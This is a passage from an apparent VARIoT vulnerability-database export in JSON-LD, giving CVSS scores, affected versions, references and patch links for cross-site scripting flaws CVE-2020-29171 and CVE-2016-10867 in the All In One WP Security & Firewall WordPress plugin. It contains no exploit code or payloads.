      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202102-0407

    Vulnerability from variot - Updated: 2024-11-23 23:07

    Cross-site scripting (XSS) vulnerability in admin/wp-security-blacklist-menu.php in the Tips and Tricks HQ All In One WP Security & Firewall (all-in-one-wp-security-and-firewall) plugin before 4.4.6 for WordPress


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202102-0407",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.4.6"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": null
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.4.6"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "cve": "CVE-2020-29171",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2020-29171",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-375335",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-29171",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.1,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2020-29171",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-29171",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2020-29171",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202102-1017",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-375335",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cross-site scripting (XSS) vulnerability in admin/wp-security-blacklist-menu.php in the Tips and Tricks HQ All In One WP Security \u0026 Firewall (all-in-one-wp-security-and-firewall) plugin before 4.4.6 for WordPress",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-29171",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-375335",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "id": "VAR-202102-0407",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:07:39.977000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All\u00a0In\u00a0One\u00a0WP\u00a0Security\u00a0\u0026\u00a0Firewall",
            "trust": 0.8,
            "url": "https://github.com/Arsenal21/all-in-one-wordpress-security/commit/4130906bc049b195467b4fc6980d6d304fbe28d5"
          },
          {
            "title": "Wordpress of  Tips and Tricks HQ All In One WP Security \u0026 Firewal Plugin Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=142332"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://github.com/arsenal21/all-in-one-wordpress-security/commit/4130906bc049b195467b4fc6980d6d304fbe28d5"
          },
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.7,
            "url": "https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29171"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-02-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "date": "2021-10-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "date": "2021-02-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "date": "2021-02-10T15:15:13.243000",
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-02-11T00:00:00",
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "date": "2021-10-20T09:06:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "date": "2021-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "date": "2024-11-21T05:23:46.200000",
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress\u00a0 for \u00a0Tips\u00a0and\u00a0Tricks\u00a0HQ\u00a0All\u00a0In\u00a0One\u00a0WP\u00a0Security\u00a0\u0026\u00a0Firewall\u00a0 Cross-site scripting vulnerability in plugins",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1124

    Vulnerability from variot - Updated: 2024-11-23 23:04

    The all-in-one-wp-security-and-firewall plugin before 4.0.6 for WordPress has XSS in settings pages. The all-in-one-wp-security-and-firewall plugin for WordPress contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. WordPress is a blogging platform developed by the WordPress Foundation in PHP. The platform supports setting up personal blog sites on PHP and MySQL servers. all-in-one-wp-security-and-firewall is a website security plugin for it. The vulnerability stems from a lack of correct validation of client-supplied data in the web application. An attacker could exploit this vulnerability to execute client-side code. NVD rates it 6.1 (Medium) under CVSS 3.1, with user interaction required (UI:R).


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1124",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.6"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.6"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          }
        ]
      },
      "cve": "CVE-2016-10867",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2016-10867",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-89686",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-10867",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.1,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2016-10867",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10867",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10867",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-886",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89686",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2016-10867",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.6 for WordPress has XSS in settings pages. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. all-in-one-wp-security-and-firewall is a website security protection plugin used in it. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10867",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89686",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "id": "VAR-201908-1124",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:04:40.052000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96575"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.8,
            "url": "https://wpvulndb.com/vulnerabilities/9736"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10867"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10867"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "date": "2019-08-13T18:15:11.587000",
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-03-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "date": "2020-02-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "date": "2020-02-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "date": "2024-11-21T02:44:56.640000",
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
